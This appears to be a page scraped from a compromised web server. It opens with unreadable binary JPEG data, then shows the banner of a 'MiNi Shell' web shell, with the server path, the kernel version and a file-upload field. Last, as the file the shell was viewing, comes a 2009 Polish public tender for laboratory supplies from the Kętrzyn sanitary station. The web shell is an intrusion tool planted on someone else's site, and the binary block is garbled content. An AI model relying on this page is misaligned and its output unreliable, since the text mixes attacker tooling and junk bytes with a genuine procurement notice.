JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271362-N-2009.html

<p class="kh_header"><b>Kętrzyn: MATERIAŁY LABORATORYJNE</b><br>
<b>Numer ogłoszenia: 271362 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowa Stacja Sanitarno-Epidemiologiczna w Kętrzynie , pl. marsz. J. Piłsudskiego 5, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 0-89 7542140, faks 0-89 7542141.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.visacom.pl/psse_ketrzyn</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.visacom.pl/psse_ketrzyn</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: INSPEKCJA SANITARNA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MATERIAŁY LABORATORYJNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> V.	Przedmiot zamówienia obejmuje  15  części (zadania): 
zadanie 1 - odczynniki chemiczne	zał. nr	1/	1
cpv	33696300-8	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Roztwór buforowy pH 4.01 	opakowanie 500ml; lub równoważny produktowi HAMILTON; świadectwo jakości z oszacowana niepewnością 	op.	1
2	Roztwór buforowy pH 7,00 	opakowanie 500ml; lub równoważny produktowi HAMILTON; świadectwo jakości z oszacowaną niepewnością 	op.	1
3	Kwas solny 35-38% cz.d.a.	1op=1 litr ; gęstość 1,19 g/ml, bezbarwny, lub równoważny produktowi POCH Gliwice	op.	6
zadanie 2 - pojemniki na odpady medyczne	zał. nr	1/	2
cpv	34928480-6	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Pojemnik jednorazowego użytku na odpady medyczne z przeznaczeniem do utylizacji    o pojemności od 2 litrów do 2,5 litra	Pojemnik:1. wykonany z tworzywa sztywnego, odpornego na działanie wilgoci, mechanicznie odporny na przekłucia i przecięcia materiału;                                 2. średnica otworu w pokrywie min.3,5 cm max 5 cm; 3.otwór pokrywy powinien posiadać wycięcie umożliwiające bezpieczne zdejmowanie igły;4. zamknięcie otworu pojemnika zespolone z pokrywą pojemnika; 5. otwór wrzutowy szczelnie zamykany po napełnieniu pojemnika; 6. pokrywa szczelnie zatrzaskiwana na pojemniku głównym;                         7. pojemnik ulegający biodegradacji;                        8. oznakowanie pojemnika zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 23 sierpnia 2007r.; 9.pojemnik i pokrywa w kolorze żółtym, a zakrywka w kolorze czerwonym	szt.	120
2	Pojemnik jednorazowego użytku na odpady medyczne z przeznaczeniem do utylizacji    o pojemności od 1 litra do 1,5 litra	Pojemnik:                                                 1. wykonany z tworzywa sztywnego, odpornego na działanie wilgoci, mechanicznie odporny na przekłucia i przecięcia materiału;                                  2.otwór pokrywy powinien posiadać wycięcie umożliwiające bezpieczne zdejmowanie igły;                      3. zamknięcie otworu pojemnika zespolone z pokrywą pojemnika; 4. otwór wrzutowy szczelnie zamykany po napełnieniu pojemnika; 5. pokrywa szczelnie zatrzaskiwana na pojemniku głównym;                         6. pojemnik ulegający biodegradacji;                        7. oznakowanie pojemnika zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 23 sierpnia 2007r.; 8.pojemnik i pokrywa w kolorze żółtym, a zakrywka w kolorze czerwonym	szt.	120
3	Pojemnik na odpady zbiorczy o pojemności 60 litrów	Pojemnik:                                                      1. pojemnik i pokrywa w kolorze żółtym;                                                       2. wykonany z tworzywa HDPE odpornego na uderzenia i chemikalia;                              3. z uchwytem do przenoszenia	szt.	4
zadanie 3 - rękawiczki jednorazowego użytku	zał. Nr	1/	3
cpv	18424300-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Rękawiczki lateksowe pudrowane jednorazowego użytku	rozmiar średni; 1 opakowanie = 100 sztuk	op.	60
2.	Rękawiczki winylowe jednorazowego użytku	rozmiar średni; 1 opakowanie = 100 sztuk	op.	15
zadanie 4 - Artykuły do sterylizacji	zał. Nr	1/	4
cpv	33191100-6	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Paski TST	chemiczny wskaźnik kontroli procesu sterylizacji parą wodną w temperaturze 121 i 134 stopni Celsjusza; 1 opakowanie  = 100 sztuk; termin ważności minimum 1 rok od daty dostawy	op.	4
2.	Rurki Browne`a	chemiczny wskaźnik kontroli procesu sterylizacji na suche gorące powietrze w temperaturze 180 stopni Celsjusza;                   1 opakowanie  = 100 sztuk; termin ważności 1 rok od daty dostawy	op.	3
3	Sporale A	biologiczny wskaźnik kontroli procesu sterylizacji parą wodną; 1 opakowanie = 10 sztuk;  certyfikat dopuszczenia do obrotu; minimalny termin okresu przydatności 6 m-cy od dnia dostawy	op.	30
4	Worki do usuwania i utylizacji odpadów 	wykonane z PP; bez nadruku; do sterylizacji parowej w temperaturze 145 stopni Celsjusza; rozmiar: szerokość/wysokość 420 mm / 610 mm; 1 opakowanie = 500 sztuk	op.	2
5	Rękaw papierowo-foliowy 	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 25 cm x 200 m	rulon	1
6	Rękaw papierowo-foliowy 	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 30 cm x 200 m	rulon	1
7	Rękaw papierowo-foliowy	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 20 cm x 200 m	rulon	1
zadanie 5 - Szkło laboratoryjne	zał. nr	1/	5
cpv	33793000-5	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Probówki szklane duże	z dnem okrągłym, bez wywinięcia, szkło simax, średnica wewnętrzna 14-15 mm, długość 16 cm	szt.	1000
2	Rurki Durhama	rozmiar 4-5 mm x 40 mm	szt.	500
zadanie 6 - Gotowe płytki sedymentacyjne	zał. nr	1/	6
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Gotowe płytki sedymentacyjne do monitoringu czystości powietrza (ogólna liczba drobnoustrojów)	1op=2 zestawy po 10 płytek potrójnie pakowanych i sterylizowanych promieniami gamma; Wymagane dokumenty: 1)certyfikat jakości 2) karta charakterystyki produktu w języku polskim; min. termin okresu przydatności 7 miesięcy od daty dostawy, temp. przechowywania +15 stopni Celsjusza do + 25 stopni Celsjusza; na każdej płytce podana musi być nazwa produktu, data ważności, nr partii, nr seryjny produktu; 	op.	5
2	Gotowe płytki sedymentacyjne do monitoringu czystości powietrza  (ogólna liczba pleśni i drożdży)	1op=2 zestawy po 10 płytek potrójnie pakowanych i sterylizowanych promieniami gamma; 1)certyfikat jakości 2) karta charakterystyki produktu w języku polskim; min. termin okresu przydatności 5 miesięcy od daty dostawy, temp. przechowywania +15 stopni Celsjusza do + 25 stopni Celsjusza; na każdej płytce podana musi być nazwa produktu, data ważności, nr partii, nr seryjny produktu; 	op.	5
zadanie 7 - Gotowe pożywki mikrobiologiczne	zał. nr	1/	7
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Agar Mueller-Hintona 2 z  dodatkiem 5% odwłóknionej krwi baraniej	podłoże do badania lekowrażliwości pneumokoków i innych paciorkowców na antybiotyki i sulfonamidy metodą dyfuzyjno-krążkową ; podłoże gotowe do użycia na płytkach Petriego o średnicy 90 mm; opakowanie na 2 x 10 płytek; Wymagane dokumenty: 1)certyfikat jakości, na który będzie umieszczona nazwa szczepu testowego i opis jego wzrostu oraz strefy zahamowania wzrostu (mm)  2) karta charakterystyki produktu; minimalny termin okresu przydatności 1 miesiąc od daty dostawy  	op.	5
2.	Bulion Muller-Kauffmanna z czterotionianem i nowiobiocyną (MKTTn) 	gotowe podłoże do użycia  w probówkach; skład zgodny z normą PN-EN  ISO 6579;  pakowane od 20 do 50 probówek (po 10 ml) w opakowaniu; Wymagane dokumenty: 1)certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego  2) karta charakterystyki produktu; minimalny termin okresu przydatności 4 m-ce od daty dostawy  	probówek	5
3	Agar Mueller-Hintona 2 	podłoże do badania lekowrażliwości bakterii na antybiotyki i sulfonamidy metodą dyfuzyjno-krążkową ; podłoże gotowe do użycia na płytkach Petriego o średnicy 90 mm; opakowanie na 2 x 10 płytek; Wymagane dokumenty: 1)certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego i opis jego wzrostu oraz strefy zahamowania wzrostu (mm)  2) karta charakterystyki produktu; minimalny termin okresu przydatności 1 miesiąc od daty dostawy  	op.	5
zadanie 8 - Sypkie podłoża mikrobiologiczne	zał. nr	1/	8
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Zbuforowana woda peptonowa 	podłoże sypkie - służące do wstępnego, nieselektywnego namnażania bakterii, szczególnie patogennych Enterobacteriaceae, izolowanych z artykułów żywnościowych i innych materiałów; skład zgodny  z normą PN-EN ISO 6579; wydajność 20g - 25,5 g/litr; w opakowaniu jednostkowym po 500g; z tej samej serii; na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (między innymi Escherichia coli, Enterococcus faecalis, Pseudomonas aeruginosa, Salmonella typhimurium); 2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy	op.	6
2	 Hektoen enteric agar	podłoże sypkie; podłoże do wykrywania i izolowania drobnoustrojów z rodziny Enterobacteriaceae, szczególnie do wykrywania pałeczek Salmonella i Shigella z produktów spożywczych, materiałów klinicznych i innych materiałów; wydajność 75 g/litr; w opakowaniu jednostkowym po 500g; z tej samej serii; na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (między innymi Escherichia coli, Shigella flexneri, Klebsiella pneumoniae, Salmonella typhimurium, Salmonella enteritidis, , Shigella sonnei, Proteus mirabilis, Enterococcus faecalis, Staphylococcus aureus), opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów;2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy, a po upłynnieniu 3 tygodnie.	op.	10
3	Salmonella-Shigella agar (agar SS)	podłoże sypkie ; podłoże wybiórcze do izolacji pał. Salmonella  i Shigella  z kału i poduktów spozywczych; wydajność 60 g/litr; w opakowaniu jednostkowym po 500g; z tej samej serii; na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (między innymi Salmonella typhimurium, Shigella flexneri, Klebsiella pneumoniae, Salmonella enteritidis, Proteus mirabilis, Staphylococcus aureus, Bacillus cereus), opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów; 2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy, a po upłynnieniu 7 dni.	op.	7
4	Bulion z irgasanem, tikarcyliną chloranem potasu - bulion ITC (pdstawa)	podłoże sypkie - służące do wykrywania pałeczek Yersinia enterocolitica izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 10273; wydajność 62g na 970 ml      w opakowaniu jednostkowym po 500g;       na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego ( m. in. E. coli, S. aureus, Y. enterocolitica) opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów;2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy	op.	1
5	Suplement do podłoża ITC - tikarcylina	1 opakowanie = 5 fiolek; Wymagane dokumenty- certyfikat jakości; minimalny termin okresu przydatności 2 lata od daty dostawy	op.	1
6	Suplement do podłoża ITC - chlorek potasu	1 opakowanie = 5 fiolek; Wymagane dokumenty- certyfikat jakości; minimalny termin okresu przydatności 2 lata od daty dostawy	op.	1
7	Agar z cefsulodyną, irgasanem i novobiocyną - agar CIN (podstawa)	podłoże sypkie - służące do wykrywania pałeczek Yersinia enterocolitica izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 10273; wydajność 58,5g na 1 litr      w opakowaniu jednostkowym po 500g;        na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (m. in. Y. enterocolitica, E. coli, S. aureus, S. typhimurium) opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów;2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy    	op.	1
8	Suplement do podłoża CIN	1 opakowanie = 16 fiolek; wymagane dokumenty - certyfikat jakości; minimalny termin okresu przydatności 2 lata od daty dostawy	op.	1
9	Podłoże CT-SMAC (podstawowe)	podłoże sypkie - selektywne podłoże służące do wykrywania pałeczek Escherichia coli O157 izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 16654; wydajność 25,8 g na 500 ml           w opakowaniu jednostkowym po 500g;        na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (m. in. E. coli, E. coli 0157, B. cereus) opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów;2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy	op.	1
10	Suplement C-T do podłoża CT-SMAC	1 opakowanie to 16 fiolek; wymagane dokumenty - certyfikat jakości; minimalny termin okresu przydatności 2 lata od daty dostawy	op.	1
11	Agar dla Escherichia coli O157 : H7	podłoże sypkie - służące do wykrywania pałeczek Escherichia coli O157 izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-ISO 16654; wydajność 55 g na 1 litr                            w opakowaniu jednostkowym po 500g;        na opakowaniu musi być umieszczony skład podłoża. Wymagane dokumenty:1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego (m. in. E. coli 0157:H7, E. coli, P. mirabilis, S. typhimurium, S. sonnei, E. faecalis) opis wyglądu kolonii oraz stopień  odzysku drobnoustrojów;2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 4 lata od daty dostawy	op.	1
zadanie 9 - Pipety sterylne jednorazowego użytku	zał. nr	1/	9
cpv	38437000-7	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Pipeta sterylna wielomiarowa o pojemności 1 ml	pakowana pojedynczo, jednorazowego użytku, z czarną skalą i wacikiem zabezpieczającym (w środku pipety - u góry); minimum z rocznym terminem ważności sterylizacji; świadectwo sterylności	szt.	500
2	Pipeta sterylna wielomiarowa o pojemności 2 ml	pakowana pojedynczo, jednorazowego użytku, z czarną skalą i wacikiem zabezpieczającym (w środku pipety - u góry); minimum z rocznym terminem ważności sterylizacji; świadectwo sterylności	szt.	1000
zadanie 10 - wyrob. diagnostyczne	zał. nr	1/	10
cpv	33124130-5	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Szybki test lateksowy do wykrywania i identyfikacji szczepów paciorkowców grupy A, B, C, D (w tym enterokoków), F i G wg Lancefield.	test lateksowy do diagnostyki in vitro;na zestaw składa się:1) odczynnik lateksowy do wykrywania paciorkowców odpowiednio grupy A, B, C, D (oraz enterokoków), F i G - każdy w buteleczce po 2,5 ml z zakraplaczem; 2) antygen kontrolny - 1 fiolka po 1 ml; 3) enzym do ekstrakcji - 4 butelki po 5ml; 4) płytki do oznaczeń; 5) bagietki  6) zakraplacz - 1 sztuka; Wymagane dokumenty:1) karta produktu; instrukcja wykonania testu w języku polskim;  minimalny  termin okresu przydatności 1 rok od daty dostawy    	szt.	1
2	Zestaw odczynników diagnostycznych do identyfikacji O antygenów enteropatogennych pałeczek Escherichia coli:	 	 	 
A	odczynnik wieloważny A	w buteleczkach  z zakraplaczem po 5 ml ; certyfikat dopuszczenia do obrotu; karta charakerystyki produktu w języku polskim; instrukcja wykonania; min. termin okresu przydatności 6 miesięcy od daty dostawy,   	szt.	1
B	odczynnik wieloważny B	jak wyżej	szt.	1
C	odczynnik wieloważny C	jak wyżej	szt.	1
D	lateks kontrolny	jak wyżej	szt.	1
3	Płytki szklane do oznaczeń	na jednej płytce znajduje się 12 pól do oznaczeń; tło płytki czarne, a obramowanie pól do oznaczeń koloru żółtego lub czerwonego	szt.	20
4	Pałeczki do wykonania oznaczenia 	1 opakowanie to 50 sztuk	op.	20
zadanie 11 -  podłoża mikrobiologiczne	zał. nr	1/	11
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Bulion z sorbitolem i solami żółci (PSB)	podłoże sypkie - służące do wykrywania pałeczek Yersinia enterocolitica izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 10273;                                  w opakowaniu jednostkowym po 500g;        na opakowaniu musi być umieszczony skład podłoża; Wymagane dokumenty: 1) certyfikat jakości/karta kontroli produktu, na którym/ej będzie umieszczona nazwa szczepu testowego; 2) instrukcja wykonania podłoża w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 2 lata od daty dostawy 	op.	1
2	Agar SS z deoksycholanem sodu i chlorkiem wapnia (agar SSDC)	podłoże sypkie - służące do wykrywania pałeczek Yersinia enterocolitica izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 10273;                                        w opakowaniu jednostkowym po 250g;       na opakowaniu musi być umieszczony skład podłoża; Wymagane dokumenty: 1) certyfikat jakości/karta kontroli produktu, na którym/ej będzie umieszczona nazwa szczepu testowego; 2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu; minimalny termin okresu przydatności 2 lata od daty dostawy 	op.	1
zadanie 12 -  podłoże i suplementy do wykrywania Listeria	zał. nr	1/	12
cpv	33698100-0			
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Bulion Fraser (podstawowe)	podłoże sypkie - służące do wykrywania bakterii Listeria izolowanych z artykułów żywnościowych ; skład zgodny  z normą PN-EN ISO 11290-1 i 2;                                w opakowaniu jednostkowym po 500g; wydajność 12,9g na 225 ml  na opakowaniu musi być umieszczony skład podłoża; Wymagane dokumenty:                           1) certyfikat jakości, na którym będzie umieszczona nazwa szczepu testowego; 2) instrukcja wykonania w języku polskim; 3) karta charakterystyki produktu;                                minimalny termin okresu przydatności  4 lata od daty dostawy	op.	1
2	Dodatek selektywny do bulionu pół-Frasera	1 opakowanie to 10 fiolek;                     Wymagane dokumenty:                           1) certyfikat jakości; 2) karta charakterystyki produktu;                                minimalny termin okresu przydatności  2 lata od daty dostawy	op.	2
3	Dodatek selektywny do bulionu Frasera	1 opakowanie to 10 fiolek;                     Wymagane dokumenty:                           1) certyfikat jakości; 2) karta charakterystyki produktu;                                minimalny termin okresu przydatności  2 lata od daty dostawy	op.	3
zadanie 13 - odczynniki i materiały	zał. nr	1/	13
cpv	33696500-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Wodorotlenek sodu NaOH cz.d.a	opakowanie jednostkowe 500g; min 98,8 procent NaOH; równoważny produktowi POCH Gliwice	op.	8
2	Odczynnik Nesslera	opakowanie jednostkowe 500 ml; przydatność do oznaczania (zakres (0,02 - 3,0 mg/l)azotu amonowego; równoważny produktowi Fluka	op.	2
3	Salicylan sodu cz.d.a	500g lub równoważne produktowi POCH Gliwice	op.	1
4	Wzorzec konduktometryczny o przewodności elektrycznej właściwej 500 mS/m w 25 stopniach Celsjusza	op=500 ml; certyfikat/świadectwo materiału odniesienia z oszacowania niepewnością; równoważny produktowi Reagecon	op.	1
5	Amoniak 25% cz.d.a	op=1000 ml;	op.	1
6	Roztwór do przechowywania elektrod pHmetrycznych	op=500 ml; równoważny produktowi Hanna Instruments HI 7300	op.	1
zadanie 14 - Suplementy do podłóż	zał. nr	1/	14
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	(D-cykloseryna)	Dodatek wybiórczy dla Clostridium perfingens dla mikrobiologii	gram	1
zadanie 15 - Gotowe płytki sedymentacyjne	zał. nr	1/	1
cpv	33698100-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Gotowe płytki sedymentacyjne do monitoringu czystości powietrza (ogólna liczba drobnoustrojów)	1op=2 zestawy po 10 płytek potrójnie pakowanych i sterylizowanych promieniami gamma; Wymagane dokumenty: 1)certyfikat jakości 2) karta charakterystyki produktu w języku polskim; min. termin okresu przydatności 7 miesięcy od daty dostawy, temp. przechowywania +15 stopni Celsjusza do + 25 stopni Celsjusza; na każdej płytce podana musi być nazwa produktu, data ważności, nr partii, nr seryjny produktu; 	op.	5
2	Gotowe płytki sedymentacyjne do monitoringu czystości powietrza  (ogólna liczba pleśni i drożdży)	1op=2 zestawy po 10 płytek potrójnie pakowanych i sterylizowanych promieniami gamma; 1)certyfikat jakości 2) karta charakterystyki produktu w języku polskim; min. termin okresu przydatności 5 miesięcy od daty dostawy, temp. przechowywania +15 stopni Celsjusza do + 25 stopni Celsjusza; na każdej płytce podana musi być nazwa produktu, data ważności, nr partii, nr seryjny produktu; 	op.	5.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.81.00-0, 33.69.63.00-8, 34.92.84.80-6, 18.42.43.00-0, 33.19.11.00-6, 33.79.30.00-5, 38.43.70.00-7, 33.12.41.30-5, 33.69.65.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą ubiegać się:
1.	 Wykonawcy spełniający warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tzn.:
a.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
